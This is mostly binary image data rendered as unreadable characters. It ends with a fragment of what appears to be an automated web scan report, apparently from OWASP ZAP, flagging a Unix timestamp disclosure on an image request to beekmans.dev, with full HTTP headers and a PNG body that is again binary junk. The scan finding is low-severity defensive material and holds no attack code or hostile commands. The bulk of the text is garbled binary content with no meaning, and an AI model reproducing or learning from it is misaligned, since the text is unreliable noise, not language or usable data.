          ٕµ)*Êڕ”ÊÀÜG ƒî§«>¶ÃþQ?Î!7W÷kâ¿Ë]Ò©º‡Ùàz‹¹sõJ‘îp)±»°²•777-3['u‚¥¾óDµp§<r7‚eÞ6HG&H”|>®ƒø|ÙGÃÄváQÏoAâ ûGùzÙ·ïh¿ån—ÿ:"ÿ£ýľŸï¶ý‡¤5½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^½÷´_ò·KÿÑþýáÉþûoØzõG¯^ûÚ/ù[¥ÿΈ¿èÿ~ðäÿ}·ì=z£×¯}íü­ÒÿçD_ô¿xr¾Ûö½Që×¾ö‹þVéó¢/ú?ß¼9?ßmû^¨õëß{Eÿ+t¿ùÑýïÞŸï¶ý‡¯Tzõï½¢ÿ•º_üè‹þ÷ïO÷Û~Ãת=z÷ÞÑÊÝ/þtEÿGû÷‡'ûí¿aëÕ½{ïh¿ån—ÿ:"ÿ£ýûÓýöß°õê^¸>OL….ÕÀ¤êqþG¯j_Q×âØ¯ùÙãÿó¶›þ¾{ßÓÏþøØÍ×µ/ñ½ü[ÿ;<þvÓ×Ï~úyÿßûùºö¥þ!׿‹b¿çgÿÎÚoúùïßO?ûáÿaÿ7^Ô¿Ä:
          û·#Ÿª÷”P×QÍ+ãéôÇTHÖÈÑ1҈協ÇãÙß-Ã2ï{{4LYâðž‘ߐlç¡øGU…îgè)×½û¯uï~ëÝ{ߺ÷_ÿÑÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¦üœø½‚ïL;eñ"—Ù8ªR˜ŒÓ/Ž›1Aš<&|ƌòR±$AQf’•Àd,Œ²o’írxrU¬˜å}?¤¿?Qçöç§¢”ÆsðõDÛ£mgv~w)¶·6.¯
          ÃÔ½&G[ŽzyBRXeƒÇ"ŽXÙ]•2|3EqsBá¢aPGú¿âº1R)%äúÿ°ÿŠûÙàzs¨/ÿ÷¦êã‰êŸŸõÿâ¾èzºñ꟟õýÓ«¯¡?üGºzuuêý?Ûû©êãêý=ÐõqçÔ9>þÃþ#Ýz¸áÔ9??ë{¡ãùõqèOôï¿§ºtààz‚ÿAþ¿ºõo>¡Éùÿ}ù÷CӟÃÔ)??ëÄ{¡êÿÃÔ9=Ôùõo>¡Éùÿ}ùöÙâ:¿˜û:…'Ôÿ­ÿ\qêýß_to‡«>¡?üWÝŸWOP¤üÿ®â}ÔõqçÔ)8¹oøu<GW^^ïò÷þb_~p}
          ßÙÂrÁŠëÞÉËÔßïÉÓ
          ÕÞÓµþü›GC‘¿ÓçË¢IC»ŽÝJÜ[®<Àÿÿ(è+»ìÔwf˜âÊ?¿å˜êò½‘ôëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÒÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺+_%þ2mÎúÀšºoµÂv&•Ó¸Ìeb«uH¸Lÿ‰ZœTÎOŽ@ZI¼a”ɇ›6õ6×.“V´cܾŸÒ_CüŸ‘E1Œú¯T)¼vŽã؛)µ7f*§žÃÎi«è*”FýQˈZšZ˜˜IѳG,l©ܝðÝB“Àá¢aPGú°}G—FŠÁ€e8éÿñ_n7N'¨R~×ÿŠû¡êëǨr~×÷N®¼z„ÿñééÕרOôÿoî§«Ž¨/ô÷CÕǟPäú7ûøuêã‡Päüÿ­î‡çÕÇ¡?оþžéӃêýúþëÕ¼ú‡'çý÷çÝNP¤üÿ­ÿÿPä÷SçÕ¼ú‡'çý÷çÛgˆêþcìêŸSþ·üGºúuqǨOõÿ}ý}Ѿ®<ú„ÿñ_t>}\q=B“óþ¹ÿ‰÷SÕǟP¤üÿ¾þžêxŽ®¼:†ÿñÛôêãêô¿—§ó	ü¡~@çB X1=yÙyz›¶˜hv¦ñ®¨ki¶˜èr27˜g?¦Od[†ßÆ{uûGùGùGA]çe®»Ë4ù²ð¯ùGæ:¾d]º÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÓÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî‹?ɍ[_¿¶í¤ðawÞ"šUÛ;¤DI^^Q‡ÌˆÁ’³	S3k4”ÎÆH¾²G)ÆÑ¼MµËе³åÿ(ô?áà|ˆzŒGú'T¾ö6èëÏ“ÙûÇQ‡Îâf1TÒÎ.’ÆMଣoe\~¸fŒ”‘
          Á÷'As
          Ü	qná¢aÇü‡Ð1Ñ´l®5)Áé'çýø¯·ON¯¡Éùÿ_Ý:ºñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõy?ËÇù8N…ùžÿqŸä؎ºì¬´üã¹Zz©¼k¦oø·~˜è²2Ÿò~"¼Z$ˆŠþº¦sæ?Ê?ÍÐWyÙ5¼³Nî,£Ïæ>~£öu~ÿ^G ý²>ýwïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^èlë/ø³×ÚÉ¿÷›Ùíý¼é?Êz9Û²“ý7ùBG²®Œz÷¿uî½ïÝ{¤Îñÿg-ÿ,#ÿ܈}«±ÿràûÉÒkÏ÷_³ü£¢ãìSÐ{¯{÷^ëÞý׺÷¿uî¿ÿÔÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¢éò+ã–Òù¶
          @EˆÞ¨e;[vEzš	[SÿÈÓ%vªSû“xØù#*÷ÔkµnÓí“jNèâ__˜ô#×ò==ÍT|>c­|»¯7oVÌÞ¸©qY¼d¾¤k½-u$…þÛ'Œª
          #­ÆÖ"–ŽUúØ«ueY:ÚêÈâÝõFGì>`úéÑÌN²ÊqÐ{'çýnôêñêÿÄ{§§W^¡?Óý¿ºž®8 ¿ÓÝW}C“èßì?â=׫ŽC“óþ·º?ŸW:„ÿAþûú{§N¨/ôëû¯Vó꟟÷ߟt=9ü=B“óþ·üGº¯ü=C“ÝOŸVó꟟÷ߟmž#«ù³¨R}OúßñëéÕÇ¡?×ý÷õ÷Føz¸óêÿÅ}ÐùõqÄõ
          OÏúçþ'ÝOW}B“óþûú{©â:ºðêÿÄ{oӫލ/ôï¿§½uqÀõO¡ÿ_ÛgÏ«Ž]ïòîþc§n6¡>AgYöó56'¯;'-Qs·®
          -­»ë§k¶úc¢¯“CqÇí´=1-õ†­S@½Þc׿>/?·ˆWzØü@זIßŔyü×çê<ü³Ç`ðCÊAR‚ ‚8 d:ïߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¡W«ÿÏæ?å•ýSì›wø`ûOù:4Û>)¾Áþ^…ÿduï~ëÝ{ߺ÷P2¿ñkÉÔgþãÉíȵ‹ý0ÿMÍý”¿éOø:+^Æz÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è•üÑÄ|{ÎlÜv7¹weÉÜSšÃ°÷$8¼¦k;¬êIÅà¨rÍ»3*%ZH‰bº]&ñ°?ØsŽw{L‘
          kZ€ûI7§ŸÊ•éU©˜91-W̫ϪÉSÃI[[KO]M“§§©š2TI[%|QHÉe,yJ„pT(‚x!”)‘ZàI
          K*’¤äiQòÁ#öÑÒùc¦‡ÿˆ÷_N®½B§ûu=\p=A§º®<ú‡'Ñ¿ØÄ{¯W:‡'çýot<>®8u	þƒý÷ô÷NœP_è?×÷^­çÔ9??ï¿>èzsøz…'çýoøt=_øz‡'ºŸ>­çÔ9??ï¿>Û<GWógP¤úŸõ¿â=×Ó«Ž=B¯ûïëîðõqçÔ'ÿŠû¡óêã‰êŸŸõÏüOºž®<ú…'çý÷ô÷SÄuuáÔ7ÿˆöß§WP_è?ßOzêãêŸCþ¿¶ÏŸW:…/çý‡üGºõqÀu³wòÊÝ_.évÙÚ½ÃÖü—Mä0ß{Ö£•ÜRŸ;ÄDö8LÞÛÉn(7–CjÖCþR´/4´j¢J'ŠJ`öà¶ÅÙ¢xµÈ¡ÏçJW×üü@{ô{ašI-nº½4'Ô4×ÔWùÖ¶Ùì· ß^÷î½×½û¯uï~ëÝ{ߺ÷CgYŞ»þÖMÿ¸´ÞÈ7oíãÿIþSÑÎÛý”Ÿé¿È:=•tc×½û¯uï~ëÝ&wü{9oùaþäCí]û—ÛþN“^¸ÒýŸåbžƒÝ{ߺ÷^÷î½×½û¯uÿÙ
          Evidence
          99221731
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        49. GET https://beekmans.dev/img/portfolio/red/Cyber-Kill-Chain.png
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          44444444, which evaluates to: 1971-05-30 10:40:44

          Request
          Request line and header section (291 bytes)
          GET https://beekmans.dev/img/portfolio/red/Cyber-Kill-Chain.png HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
          Accept: image/webp,*/*
          Accept-Language: en-US,en;q=0.5
          Referer: https://beekmans.dev/
          Connection: keep-alive
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1149 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:56:19 GMT
          Content-Type: image/png
          Content-Length: 418630
          Connection: keep-alive
          last-modified: Tue, 28 Sep 2021 10:12:46 GMT
          etag: "66346-5cd0b748663a0"
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          Cache-Control: max-age=14400
          CF-Cache-Status: MISS
          Accept-Ranges: bytes
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E2orYqFsWT64G3opaMnBKM9ppGt0CqNGFKj9GhS8qqUhBFuW5Y4yC0jEF5yYFczxZgwBfbG4KbdNA7AnZh87yNoU6hUqp%2FUhMIppocRYnBEN%2FtLcZr5yxLHxrbEEXl0%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a4c76cb1417e-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (418630 bytes)
          ‰PNG
          
          
          IHDRŒ^`ùqçsRGB®ÎégAMA±üa	pHYs‡‡åñeÿ¥IDATx^ì]|Å÷Ç¿åg¥…ôäJ
          ½—$ ˆ`Ã.6zMìQ±‚AEQª]@Péi" ½·´K/@òþß7;»Ù»l’¹ÀEïûù¼ÏííÎμyûæÍ›^Ã<ðÀœGQQÑ
          bìÞKg>ù”Î|ð	Ñ®Ýâž-–Á.9ÀËË :s–ò¿žAyïL ó‹WùܺN½¤õAǙ¯s¿, ¼·ß£ü³Á¤à34PõÀ`Agö|€l>fJ
          £ÔÀPJõ·*Ä×|Ï8C¾vс¿çÌä)d«í_Ìg@ˆÂ'ÿ*÷Ò´|"|wùêEÒAù”j®_
          ŸŠLmuü©`î|æs|Ճ8';n¨TT%.YN	™Y”˜dO¸—´øJõasF<ÇŸ.£©r@'ëÑéÁ#+Aò¨1”‘I	IÉö|¦¦Q"jT“T Ð&Ìç9ÍE T_Šؚµ¥„_v|&§P‚-•’=!òcó
          ä×—Éh<pZ†ª˜‰›·ÚºJ\¿QQX(ÉI]•i<œ=l„H3eèE	ø*AiiJÁƒdÈèªÂ
          ³Åõ6)͈/G‚BÛzÜ%òw拯™U‹ŒÎƒòåøÇV/HXŽ„ôŒ’Â…¥ûjēô5(ÑÑê1á#	%!®õ2Z—qe~\|ä„}JòáÙ"oïWµ2sü¢°
          Œ7ä£<JZµV¼væ7,ÓÿÉh=(
          R»ôVí…å(Qå^lݚú]w-ÅÔ¼APÿ®§©qq%Âñ»©~ÊèØo–Ñ»ç÷îW”øà!²!½1c^£÷Þ}ôžS4áϯ¶¦mD¡Ÿ	2j—ñ°å·Ýû°&ŸVM›ÓÜúM쨍_@±ü(qù
          ¥Ðåä^²vHµ=«(ª4Mˆ°º‰¨²{_u%e…Ó*ß M‘ÿö7“
          áûùiaõï	Áge»\ðPŽ£¬|ÉϾ$j…í\hИˀOé,1oÑ}ú
          ^¹öÈz¨Îke.øLo!üwM. ‡nê,ÒoH‘ \ßdƈl{ ÐY¸Ðý(“ðÀN´­n Ù`EUÁ%¥ØhÀµ×Ð@Ð(îO>þô^]/M‘¿©çOÓ½ý(×®¹ZM× ´µ½‘Rë°ào’ɸ¹¯¼&B¢ö†ÐîÝ{XÆšZÞÔ¿ç]
          ¯xW:@&áp|Â0œ<­É„IUäŽÁf
          0[ĵ3Šœã€Úòܟ›=V¹4hB×)"+‰ª´N\ä´ôbÁge¹\AP(&ÚP8’>ž¬ñ¸;ÀJ;wîéäœ<EÓ¼|iۛo‰ÿ*riº_íüx¢øo§È T´ÎNîRɄ;!wª<$EµjM;;w§½ }7u×]­(˜áŒ(åîÁ«h¸Ô8ük;
          VU´à $Ñ×_'”´ÍëK*®$í™­¸>ŽT¯@Êÿá'—)+¡(pÙÙ"~M‘wí¢é>4­žÍô¦PÚìã'„ÒN÷
          DÍáO3äý3))%9åÁLj¹P2©Jñ<Ç}ÁI_Mñ<t˜>B‡@±1±Oñ±qâkþ=|ä¨S: 
          çñɤ<Ð#­i[ø`ݵ+J"\(*/”N»ü-‚ø:
          ÷øYo(q4Èî}­}²„²à]ÒÚæÑDáVÈøõùëÚõhëoQö‰´ [*@Àøº®ý†`&†ó»t£Â‚‚Šœp츈|ΑIU
          ˆç°(p¬|ˆ?ª]…èÒé¦2‰Ãt5YKß¿­{¥í>)=Ýã^8Boo«åKIM*þ°’ú¡‘7ÖVUX#âgl•^wm‰÷Sâ'›Ò×X&W)ä¾úº]ãI¯ÈÇ-¢YÁVšdÖWžé3ÄýY|֙QB‘áq^À§K,§Áñ©®ZZzúÊFqäWϛò¤\} ¼)øeùšLhÜÊڎݠs›·xÙøvwñÐnÒ·?”lŸËÿOs!¸Á7²V-:„Ç>X䏿{ÚsXoÇ÷“_zU(ÐF&W)d~Bô2¨ñëy͐a43ÀD+câ…ÒªXòðcÂ¥XÖ§?Í4‹{%™»¡0™T¥ÀñE–ƒQä³RyUâšÐN‘Ñ(?·fG‘EãTò¨±%›lKÕµ<J1@IyðQ²yñwuɨTއŸØùò%{')n‚#rànèï—PdȁÂ@6™T¥€xò…"K_¾"Š|\‰;uÔ¢Wd4 ábɤ<Ѓ/Ä@ˆƒ`™^mßÞPqõôÎ]:¥ÐQjƒæ”qëÝ.:œS|d4Ø8~Vdöסº=€Âè,Ùàß÷¿÷>ÏÄ_©Cë¯Ê¤*”•-©h$þ³[Ä!®ÅuF®ErŠRsyÙ痯Ôúf…ûxpñ ˆ 4êéîõ7p+DÃÖ³p÷^—	-¦°t'Njé,üíwz¬ËÍ¢Þ·Þ®Y8&[»Žb†â¯+“ª È-ÙJé-⯈"ç#<H¢R&HUäÄö(=™”zল‚ð1Gáöþ¿Ëì”öôÞ½tr÷n­kN(òÿ®*ñ^âN¥‡qgËd*
          ÄÕVLy„â9¦§wšíèÞ»î6+ˆø,ÜwÀ¥VîìÓ4ãPEf7ˆX‘SÚRª©ËÔK&ã(áW¥Gv-bGáö»ê
          Ma¹#?7WP¿+‹ïõXp\{°õ¸J&ãA)„UÎRüOGbEæî*== s#)%~˜êVü*“p	ßÉTÿш®ˆ"geç—I#äDŽ˜œ›§¸·¢,@ðE,¨¤©J'¾ ’{#T…n1Ó³ÑË­[ÑP?_í~4™çd¨ï%¿6N­].t°9ÒÆVÙaçŸÝ{hŊ•´jÕêÖìöî=ijåËWؽ£0œÿëï*Q^M#
          ÒÉÊɵOۀ²¡¬¥Ýç=žOü»dÐæ_‚«„à҄È
          :ÿÃ5¥U}äØZ5Åÿe3f
          Ë¡…ßñˆãܶíUf9¸€pA±Ýõ`qºà!	¼–Gjø®ª}͔ޔ•ã6µKx'0Ÿ¢¦Ó§]AJåÉGUdþ•€àC³ã•y¾‰+WÛUy¬ŠžRus3˜’~œ#ÞÍ}ý-Vm•€ò”ªÖÖñf;œ"¶ÄPb[Ö*m8A©<!‹-ªÓ“êu”ÞLä³Ú(±_ûÁÄäÕ¡Ã
          òÖE‡odÌ7·ôÎ|‰†
          +IÓ¶”®›Tñ€,¿söç¹´rÓÞv2Ê*ÃõM[AçÏÿ–çt$œ²ŸefH°Ú)ƒ‡>ÓÐpÚ¾çh•+‡¹sÿ«³òΒ
          ®§›üÎxÁ‡!zÚ¾CYÂ%W²\פ÷¥ûÂ/jùFÆjä×6®ÊÁZúQqBx¼fŒ…Ÿji@ɓ?‡%ƒEáI÷L°.ÉOÂóp†Uu[@qUª õZÇù3Ÿ^mRÒLïÐUá<¤Ä.æ‘çV£ &®\£¬a¥ƒ’<6òC™×AUÊ«oT¼H絏¤|î¯fWÃÏJ¶.=(aË61<.ød~)å¡>¢`r~²Äӑ“)äÝ.FÄQ#ì	÷^!â“ÄŒêÉ»mô3òñE×úô}"¢GCGzñz³t0áV&ñA,Ú
          êÞ#?:§ßPFírø¢ éÓêüèèXæ!ï­÷µ…¨Ÿ’Wîsªú?j·Š¶{ß'"ö˜ŒÚ¥Ÿùútnh9€Ó?p~óV|(«ŸÞÁtvæ·B¦~Q±ßéßç|˨ݾVYPDìòq•é/}º¬Ôò‘|€> cB®÷€Të£â$¹° çõi€ì&ú€§(Ð2É&óyôÈWpˆƒ|ÛG7•\ŽŽiÈG`Íž>U¸T€ÿóñÓR`ƒ`O\ª|ä¾ð‹ŒÍ±gZ0^¥+’áÃÕvLS>ª0êFô®é—_ˁÞòq¥á×.æ]ûøË¶PmÚÔ¸R^–€o‡è®öq]x¾àweäÀù´‹/"º«|ä¾ð‰ŒÛfÇ´Bçåc—ÃъzEÅÜ%]|#b¦èãc’*
          Çx¹!%]Çi»8
          j¢_{‡Ú5*v‘|tAð‹ØØ.>|äހ2|èÈ8G>v|"cÒíÒq‘_‹¸
          ôñº‚wGåð‰Œ*U
          %⍈ž&]àîÕÇçªÆ$\•vñº¨ÐU9üÚÆÝ®g\[ØÞcntŒ_>r	Júv1så£
          ñ1ììGlæL¸Ëôq3ÕjÑ¿¶|V!Flá—|T&BM&§ækûµb·O»˜eò‘{#0"6HϸBeû…h0<
          :¢4Ё{ñ£Í{pô»¼ÚF7\‚ƍG_¥Ÿ©.ò#sc§xúS0§îÂϽ2X
          ïv±·:Æ#•‹ú!¡N…EœïÙ§a/cð4”«p¨!÷&Ê Ž2õiãÔsÎ*2C?“¹óP?ùˆùR+ê€{keKˆÎ£¯pdžéºöƒ}d0›pfÂǔU7>ñò+8x9ô\íÚ4×˗2ë7{MLŸ³Ê®«à”ŒÆ¥€‹ôº>T,Ô/)-ÒÀ‹èÒÓºžŠ»¡xáfބ‰öxí–ýu|ÆR@ûèV2úrá¬"3w¡>ŽŠ›qóídãyŸÅ]f¼`Uí~´Ü4Ôî}P¦Œº\tîÜù
          yY.ü#£ŸÔ§Sòa6s^yMÈ­˜OùËäg¡´&mŸéë2ªKÇF“Oہ·€±7ó&FëùQ¿®§¾W\N«ø‘N;NÙ<Š»ïïôå°ab–ïC‘&/Pe#žªí›DüY‚×v1"MÑÊJÐ*’ÿÚ¡¬¢àAÈÌA“Ÿ|VQ˜€±UÔè~PòwHF[%à~ZïvÑt®°ˆÒ·R”Êš¸è7…Ïô…Oþ¯bHÏ9ʤ¤e‹ÂZÕý½>Qq¢wëû…ëI¬c”²JzíMe„“‡Âa,„\y6ݦ-”jn Èü2dT—Žƒ	)bçœ~5¯§'L°So½¥;8yJûÏK—þ³›\ó?zµN]ÊûäSZ½ýp¤Œ¾Êpÿã(÷·AvºEš§'®ÿe>­;ώgxÐôÙ❴Ð&tädrÕß¿g=þÈlÁÄÚ@g†’™Ub”õ‰Ì§ÓöB‘“wVðÈòIüm©?<ê³¸xúnÌ»û<õÕÆsšñNÁÂߨ:Wé|˜2ÁÃǬÄŽ&PV=“Xå¼}íZ{†%9*2ω
          ðñ“´ŸoÖL¸ycÞàÙ
          ¸ø®¦ìÇG*߸IðñTÃwGQ7²A}»i vÄëé|ÍBIÀçŸ2Ú*+¡(lw–œ¿ÌÊáïíCA!϶›IÇ„ç¶Æ­Åû¥S	n+/ä.jÞlÒ~.Ìó­ZÒØk•=ú¸ör啔Ì5ˆ.LÒÏóŸg¿ýezŒöâcÀó“Of êãUÌ'Ž°cR0
          !ÿ
          w¢]«Öôҋ/QFf–ØàC?Ù|͚µôz×®4´fM*<Zu“gÎmÚ,„Æ»fÚ ”]ue‡Ó3:Eæ=2f{ûÑÒiÓJäEoëk¡ôVQ,øæ2êrQñžÞW¼á OˆW¯Sq­—ËT{¦ÛaÉ_”-:âK“Q—‹Š4öïSÂÿEáV÷é;yü„¨ÝzíÌ
          §…>šlyöR¿ Ú¼ø7Úº´Ør'.].¾Kx—Q_|œß€âÀ䇟‚ŒÝEÖ`­\¹ŠºÞԙþÞ±“&~<QÜÓ¦={öŠÌnõÖ.KFï2 Î<öÝv=ù4õ½ò
